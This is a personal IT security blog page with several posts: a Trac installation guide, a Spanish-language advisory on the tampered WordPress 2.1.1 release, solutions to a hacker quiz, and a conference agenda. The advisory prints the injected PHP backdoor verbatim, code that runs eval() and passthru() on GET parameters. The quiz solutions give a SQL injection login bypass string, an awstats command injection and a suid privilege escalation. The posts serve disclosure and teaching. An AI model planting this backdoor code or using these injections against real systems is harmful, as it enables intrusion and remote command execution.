Blog, Development, GNU/Linux, IT Security

ChiliProject 1.4.0 + Ruby Enterprise + Passenger + Apache2

I was a happy Trac user, but after seeing Redmine, I realized that Trac has many missing features and that you must do a lot of things with plugins, Redmine has this features out-of-box. After working a bit with Redmine I discovered ChiliProject, which is a fork of Redmine, and its actually compatible with Redmine Themes and Plugins.

Here is a comparison of Redmine/ChiliProject and Trac features:
Continue reading

Blog, GNU/Linux, IT Security

Installing TRAC with mod_wsgi using virtualenv

This guide is for installing Trac as a user using virtualenv for a isolated Python environment so that the whole installation runs under a specific user.

First of all we need to install needed packages

apt-get install libapache2-mod-wsgi python-virtualenv python-setuptools

Once we have installed the required packages proceed to create the Python environment

mkdir /usr/local/trac
cd /usr/local/trac
virtualenv python

We now have the isolated Python environment locate under /usr/local/trac/python.

To make possible to use easy_install with repositories we need to upgrade easy_install. I use this to install Trac plugins directly from SVN.

/usr/local/trac/python/bin/easy_install -U trunk

We now can install trac 0.12 using the 0.12b1 SVN Tag (http://svn.edgewall.com/repos/trac/tags/trac-0.12b1 or Trac==0.12b1) or directly from SVN Trunk:

/usr/local/trac/python/bin/easy_install http://svn.edgewall.org/repos/trac/trunk

This will download and install the latest trunk version for Trac.

To have webaccess to the Trac projects, we need a .wsgi script, were we define where our local python environment is located:

# Not needed if mod_wsgi >= 3.0
import sys
sys.stdout = sys.stderr

# Load Trac
import trac.web.main
application = trac.web.main.dispatch_request

And finally we need to configure apache. If you want only one Trac project, you should define trac.env to the location of your trac, but if you want multiproject support, you must use trac.env_parent_dir (this is what I used)


    ServerName trac.dns.com

    DocumentRoot /usr/local/trac/htdocs
    ErrorLog /var/log/apache2/trac-error.log
    CustomLog /var/log/apache2/trac-access.log combined

    # Trac Auth
    
        AuthType Basic
        AuthName "Trac"
        AuthUserFile /usr/local/trac/.htpasswd
        Require valid-user
    < /location>

    #Trac
    #Define ProcessGroup with user and group under which it should run
    WSGIDaemonProcess trac user=trac group=trac python-path=/usr/local/trac/python/lib/python2.5/site-packages python-eggs=/usr/local/trac/python/cache
    WSGIScriptAlias / /usr/local/trac/htdocs/trac.wsgi

    
        WSGIProcessGroup trac
        WSGIApplicationGroup %{GLOBAL}
        SetEnv trac.env_parent_dir /usr/local/trac/projects
    

We need to create the user and change the permissions for /usr/local/trac for that user trac

adduser --home /usr/local/trac --shell /bin/false --no-create-home trac
chown -R trac:trac /usr/local/trac

If you get an error “ImportError: No module named simplejson” just install it using easy_install

/usr/local/trac/python/bin/easy_install simplejson
Blog, IT Security

WordPress 2.1.1 Comprometido

Hace unos dias alguien ha entrado en la maquina de descargas de worpress y se han cambiado dos ficheros en wp-include en los cuales han metido codigo para ejecutar codigo por medio de parametro GET. Tal como dicen en la web de wordpress hay que actualizar inmeditamente a la version 2.1.2

El codigo injectado esta en estos dos ficheros:

  • wp-includes/feed.php
    function comment_text_phpfilter($filterdata) {
        eval($filterdata);
    }
    
    if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }
    
  • wp-includes/theme.php
    function get_theme_mcommand($mcds) {
      passthru($mcds);
    }
    
    if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }
    
Blog, GNU/Linux, IT Security

hacker::quiz

Ya ha acabado la bkp 7ª edicion, y para quien le interese aqui os cuelgo aqui el codigo del hacker::quiz de este año. Realmente es muy sencillo, pero aun asi os colgare las soluciones.

Descargar hacker::quiz

  • Level1
  • Aparentemente no parece que hay ningun error de programacion, pero si pruebas de buscar los .bak, *~… encuentras el fichero login.php~ y en el aparece la contraseña en md5. Con un cracker de md5 como por ejemplo lcrack. En pocos minutos saldra la contraseña del nivel.
  • Level2
  • Aqui hay que fijarse que en el codigo hay un “src=javascript” y que el codigo bueno esta en el fichero javascript. Aqui se una un algoritmo de encriptacion super sencillo, que se puede desencriptar facilmente cambiando la funcion generatePass para sacar la contraseña.
  • Level3
  • Este nivel es un formulario con sql injection super sencillo, cuando pones un ‘ el error cambia a “Error Sql”, por lo tanto con un sencillo “‘ OR 1=1 — a” te saltas la autenficiacion y pasas al siguiente nivel
  • Level4
  • En este nivel hay un applet java que gestiona la autentificacion. Descargando el .class y descompilandolo con un java decompiler tipo jad. Analizando el codigo ves que accede a un fichero del que saca el usuario y contraseña.
  • Level5
  • En este nivel, se puede ver que el formulario es multi-idioma, pero si cambias el parametro del idioma, intenta acceder a un fichero, por lo tanto, cuando pones “login/index” da un error de que no encuentra authdata.php, apuntas a ese fichero y te aparece el usuario y contraseña por pantalla
  • Level6
  • Aqui puedes ver que la autentificacion tiene unas estadisticas creadas con awstats, investigando un poco te das cuenta que la version de awstats es vulnerable a injeccion de comandos en la variable “configdir”. Haciendo un ls ves que hay un fichero “instructions-next-level.pl”, haciendole un simple “cat” se puede ver en los comentarios la contraseña
  • Level7
  • Aqui te dan una linea de un usuario de la maquina, al cual con por ejemplo “john the ripper” crackeas la contraseña y consigues acceso a la maquina. Una vez dentro de la maquina, buscando un poco te encuentras con un fichero “getsh” (el codigo fuente esta incluido en el fichero) con suid en “/opt/…/”. Analizando el fichero con un editor normal o un editor hexadecimal, encuentras el string “/opt/…/theshell”, y basta con copiar el fichero “mysh” a “theshell” y ejecutas el “getsh” y ya eres root.
Blog, IT Security

Congreso No Con Name 2006

El proximo jueves 28 de Septiembre tendra lugar en el Parc Bit el congreso de seguridad informatica No Con Name 2006 que este año cuenta con ponentes traidores de fuera de España y con conferencias muy interesantes. Las conferencias que se daran seran las siguientes:

  • Andrés Tarascó ( Madrid – SIA ) – Exploiting win32 design flaws
  • Ramón Pinuaga ( Murcia – S21sec ) – Auditoría en DB2 ( un enfoque práctico )
  • Jesús Olmos González ( Barcelona – Internet Sec. Auditors ) – Seguridad de Código mediante tecnología vírica
  • Ero Carrera ( Germany- Sabre-Security ) – Reverse Engineering Malware. The Analyst’s View.
  • Raoul Chiesa ( Italy – Telecom Security Task Force ) – Having fun with X.25 hacking
  • Cesar Cerrudo & Esteban Martinez ( Argentina – Argeniss ) – DataTheft. How databases are hacked and how to protect them
  • Angelo Rosiello ( Italy ) – Shadow Sofware attacks
  • Ollie Whitehouse ( U.K. – Symantec ) – Future Threat Analysis of Microsoft Windows CE 5
  • Shawn Merdinger ( USA ) – Hacking Wifi & Wired VoIP Phones
  • Alejandro Ramos ( Madrid – SIA ) – Presente: DNI-Electronico